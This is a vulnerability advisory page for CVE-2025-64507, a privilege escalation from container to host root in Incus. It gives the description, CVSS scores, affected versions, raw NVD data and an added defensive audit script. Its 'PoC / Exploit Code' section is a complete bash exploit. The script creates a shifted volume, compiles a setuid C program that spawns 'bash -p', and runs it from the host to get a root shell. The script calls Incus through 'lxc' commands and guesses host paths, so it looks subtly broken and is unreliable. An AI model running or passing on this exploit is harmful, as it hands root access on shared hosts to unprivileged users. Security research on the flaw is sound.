Security Vulnerability Report
CVE-2025-64507 CVSS 7.8 HIGH

Published: 2025-11-10 22:15:39
Last Modified: 2025-12-29 16:29:39

Description

Incus is a system container and virtual machine manager. An issue in versions prior to 6.0.6 and 6.19.0 affects any Incus user in an environment where an unprivileged user may have root access to a container with an attached custom storage volume that has the `security.shifted` property set to `true`, as well as access to the host as an unprivileged user. The most common case for this would be systems using `incus-user` with the less privileged `incus` group to provide unprivileged users with isolated, restricted access to Incus. Such users may be able to create a custom storage volume with the necessary property (depending on kernel and filesystem support) and can then write a setuid binary from within the container, which can be executed as an unprivileged user on the host to gain root privileges. A patch for this issue is expected in versions 6.0.6 and 6.19.0. As a workaround, permissions can be manually restricted until a patched version of Incus is deployed.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:linuxcontainers:incus:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:linuxcontainers:incus:*:*:*:*:*:*:*:* - VULNERABLE
Incus < 6.0.6
Incus >= 6.1.0 and < 6.19.0
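
A host-side audit for this issue, as an added example (not code from the Incus project or from this report): it checks a version string against the affected ranges listed above and walks a volume directory for setuid/setgid files, the artifact the description says is written from inside the container. The function names are hypothetical, and the volume's host path is an assumption supplied by the operator.

```python
import os
import re
import stat
import tempfile

def is_affected(version):
    """True if version is in the ranges this page lists: < 6.0.6, or >= 6.1.0 and < 6.19.0."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version.strip())
    if not m:
        raise ValueError("unrecognised version: %r" % version)
    v = tuple(int(part or 0) for part in m.groups())
    return v < (6, 0, 6) or (6, 1, 0) <= v < (6, 19, 0)

def classify(mode, uid):
    """Label a file by its setuid/setgid bits; a root-owned setuid executable is the dangerous case."""
    if not stat.S_ISREG(mode) or not mode & (stat.S_ISUID | stat.S_ISGID):
        return None
    if mode & stat.S_ISUID and uid == 0 and mode & 0o111:
        return "setuid-root"
    return "setid"

def scan_volume(root):
    """Walk a volume directory on the host; return sorted (relative path, label, mode string)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks out of the volume
            except OSError:
                continue
            label = classify(st.st_mode, st.st_uid)
            if label:
                hits.append((os.path.relpath(path, root), label, stat.filemode(st.st_mode)))
    return sorted(hits)

def demo():
    """Constructed sample tree: one ordinary file and one file with the setuid bit set."""
    root = tempfile.mkdtemp(prefix="volume-audit-")
    for name, mode in (("notes.txt", 0o644), ("helper", 0o4755)):
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
        os.chmod(path, mode)
    return scan_volume(root)

if __name__ == "__main__":
    for version in ("6.0.5", "6.0.6", "6.18", "6.19"):
        print(version, "affected" if is_affected(version) else "not affected")
    print(demo())
```

Any `setuid-root` hit on a custom volume that unprivileged host users can reach deserves investigation, whatever the installed version.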

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```bash
#!/bin/bash
# CVE-2025-64507 PoC - Incus Local Privilege Escalation
# Prerequisites: User must be in 'incus' group and have access to incus-user

set -e

INCUS_IMAGE="ubuntu:22.04"
VOLUME_NAME="exploit-volume-$$"
CONTAINER_NAME="privesc-container-$$"

# Step 1: Create custom storage volume with security.shifted=true
echo "[+] Creating custom storage volume with security.shifted=true..."
lxc storage volume create default $VOLUME_NAME --type custom security.shifted=true 2>/dev/null || true

# Step 2: Launch container and attach the volume
echo "[+] Launching container..."
lxc launch $INCUS_IMAGE $CONTAINER_NAME

# Step 3: Attach the volume to the container
echo "[+] Attaching custom volume to container..."
lxc config device add $CONTAINER_NAME exploit-volume disk source=$VOLUME_NAME path=/exploit

# Step 4: Create setuid binary inside container
echo "[+] Creating setuid binary inside container..."
lxc exec $CONTAINER_NAME -- bash -c '
cat > /exploit/privesc.c << "EOF"
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
    return 0;
}
EOF
gcc /exploit/privesc.c -o /exploit/privesc
chmod 4755 /exploit/privesc
'

# Step 5: Execute setuid binary from host to gain root
echo "[+] Executing setuid binary to gain root privileges..."
echo "[!] If exploitation successful, you should now have root shell"
$HOME/.local/share/incus/storage-pools/default/$VOLUME_NAME/privesc || \
/var/lib/incus/storage-pools/default/$VOLUME_NAME/privesc || \
echo "[!] Manual execution required from host"

# Cleanup
echo "[+] Cleaning up..."
lxc stop $CONTAINER_NAME 2>/dev/null || true
lxc delete $CONTAINER_NAME 2>/dev/null || true
lxc storage volume delete default $VOLUME_NAME 2>/dev/null || true
```

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64507", "sourceIdentifier": "[email protected]", "published": "2025-11-10T22:15:39.460", "lastModified": "2025-12-29T16:29:38.553", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incus is a system container and virtual machine manager. An issue in versions prior to 6.0.6 and 6.19.0 affects any Incus user in an environment where an unprivileged user may have root access to a container with an attached custom storage volume that has the `security.shifted` property set to `true` as well as access to the host as an unprivileged user. The most common case for this would be systems using `incus-user` with the less privileged `incus` group to provide unprivileged users with an isolated restricted access to Incus. Such users may be able to create a custom storage volume with the necessary property (depending on kernel and filesystem support) and can then write a setuid binary from within the container which can be executed as an unprivileged user on the host to gain root privileges. A patch for this issue is expected in versions 6.0.6 and 6.19.0. As a workaround, permissions can be manually restricted until a patched version of Incus is deployed."}, {"lang": "es", "value": "Incus es un gestor de contenedores de sistema y máquinas virtuales. Un problema en versiones anteriores a la 6.0.6 y 6.19.0 afecta a cualquier usuario de Incus en un entorno donde un usuario sin privilegios puede tener acceso root a un contenedor con un volumen de almacenamiento personalizado adjunto que tiene la propiedad 'security.shifted' establecida en 'true', así como acceso al host como usuario sin privilegios. El caso más común para esto serían los sistemas que utilizan 'incus-user' con el grupo 'incus' menos privilegiado para proporcionar a los usuarios sin privilegios un acceso restringido y aislado a Incus. 
Dichos usuarios pueden ser capaces de crear un volumen de almacenamiento personalizado con la propiedad necesaria (dependiendo del soporte del kernel y del sistema de archivos) y luego pueden escribir un binario setuid desde dentro del contenedor que puede ser ejecutado como un usuario sin privilegios en el host para obtener privilegios de root. Se espera un parche para este problema en las versiones 6.0.6 y 6.19.0. Como solución alternativa, los permisos pueden ser restringidos manualmente hasta que se implemente una versión parcheada de Incus."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxcontainers:incus:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.0.6", "matchCriteriaId": "22A65942-B80B-4A93-ADF9-AF639CE3C1BE"}, {"vulnerable": true, "cri ... (truncated)